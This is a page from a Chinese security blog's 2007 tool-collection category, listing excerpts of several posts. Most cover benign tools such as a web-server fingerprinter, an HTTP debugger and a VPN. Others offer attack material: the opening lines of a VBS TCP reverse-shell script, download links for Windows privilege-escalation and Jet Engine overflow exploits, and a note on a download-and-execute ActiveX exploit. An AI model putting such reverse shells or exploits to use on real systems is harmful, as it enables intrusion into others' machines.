分类：工具收集 | 第52页 | 鬼仔's Blog鬼仔's Blog

httprecon

2007/12/23 6:52 | 鬼仔 | 工具收集 | 消灭0回复

来源：ZwelL's Blog

一直以来，Web服务器识别都是使用httprint来进行扫描，现在多了一个选择了，而且还是开源的，先试试。
Visit ： http://www.computec.ch/projekte/httprecon/

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important 阅读全文 »

TCP版backshell的VBS脚本

2007/12/22 4:52 | 鬼仔 | 工具收集 | 消灭0回复

'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷
'by 009, [email protected]
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234

Sub WSEvent_Connect()
wscript.echo "Connected!"
end sub
阅读全文 »

Tags: TCP, VBS

Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp & win2k3

2007/12/19 12:32 | 鬼仔 | 工具收集 | 消灭0回复

secdrv local exp
winxp cn sp2, win2k3 cn sp1 测试通过

之前的版本只能xp下用，这个2k3也可以了，其实前段时间朋友给过我一个这个漏洞的1day，但是朋友的东西不能乱发，这次是自己写的，发出来大家恶心一下。

http://www.blogjava.net/Files/baicker/secdrv_local_exp.rar

by 009
http://www.blogjava.net/baicker

Tags: Exploit, Vulnerability, Windows

Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability for xp 2k3 (fixed)

2007/12/18 1:57 | 鬼仔 | 工具收集 | 消灭0回复

之前的反弹sc有问题，请重新下载测试（071218）
http://www.blogjava.net/Files/baicker/Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability for xp 2k3.rar

（怪不得有人说成功有人说不行，不过有人说根本没有sc，我不知道为什么了，我发的只是sc错了，不是没有sc）

by 009
http://www.blogjava.net/baicker

Tags: Vulnerability

HTTP协议调试器–Http/Https Protocol Debuger

2007/12/17 3:28 | 鬼仔 | 工具收集 | 消灭0回复

中文：HTTP协议调试器
英文：Http/Https Protocol Debuger
程序：HttpDebug.exe >>>立即下载
版本：V1.02
日期：2002/06/29
大小：152K
运行：Windows 9x/Me/NT/2000/XP
版权：电猫工作室(EMouze)
主页：www.emouze.com
联系：[email protected]
备注：本软件为绿色软件，只有一个执行文件，拷贝到任意一个目录下执行即可。

功能特点：

1.支持HTTP和HTTPS(SSL加密)网络协议的跟踪和调试。
2.可以查看到HTTP/HTTPS协议连接的详细过程和返回结果。
阅读全文 »

Tags: HTTP

ActiveX漏洞通用Exploit

2007/12/16 12:13 | 鬼仔 | 工具收集 | 消灭0回复

作者：疯狗

终于在milw0rm找到了一个不错的shellcode，down&exec的，灰常好用！顺手写了一个C测试了下，结果是成功下载并执行了"木马"，muma.exe是我用delphi写的一个简单的执行测试程序，无毒无害。
阅读全文 »

Tags: Activex, Exploit

免费VPN,轻松浏览–Smarthide(Arovax出品)

2007/12/15 10:09 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注：以前还发过另外一个国外自动免费VPN代理Hotspot Shield 。

来源：cnBeta

感谢番茄的投递
软件名：Smarthide Arovax公司出品
一个全局VPN，通俗的说就是把你的上网环境彻底移到美国，你所有的网络连接将通过这个VPN软件挂上美国的代理然后访问互联网。
点击make me invisible就可以连接了，注意连接过程会造成断网，QQ需要重登录。
需要注册交钱才能自动跟随系统启动，自动重新连接，自动提示连接中断，不过还可以，起码比好多别的手段好(例如没边等软件)，VPN是很安全的方式。

http://www.smarthide.com/

下载地址：http://www.smarthide.com/distribs/SmartHide_2_setup_56_trial.exe

安装后双击启动：注册一个用户名，提供下邮箱，邮箱可以随便填，只要你能保管好密码，输入后他会提供你一个密码，输入用户名和密码后即可连接。

免费版不能得到更快的IP服务器，不能得到断网提示等等，不过不用管他，免费就好。

欢迎访问番茄实验室：http://hi.baidu.com/tomatolabs

Tags: VPN

百度空间文章提取工具Alpha2

2007/12/14 8:28 | 鬼仔 | 工具收集 | 消灭0回复

作者：Monyer
来源：梦之光芒

Monyer自己也知道，现在的软件成天的Alpha1、Alpha2…Beta1、Beta2…Preview1、Preview2…Sp1、Sp2很讨厌，成天没事总升级玩了。但是Monyer似乎没有突破这个传统——百度空间文章提取工具Alpha2。

原因很简单——在我认为基本上完成它需要几个月的时间（我需要学习等等），所以必然不喜欢期间老版本的一些蹩脚的功能使大家反感，另外也希望每次更新大家的评论能给我一些建议，不至于画蛇添足。

简单介绍一下对这个东西的开发版本控制（在功能开发阶段会延续Alpha版本，在测试完善阶段会发布Beta版，直到相当完善了再发布正式版给大家，望理解）

所以熟话说“先明后不争”：如果只是为了尝鲜的好友，那么可以使用A 阅读全文 »

Tags: Alpha, 百度, 百度空间

鬼仔's Blog

分类 ‘工具收集’ 下的日志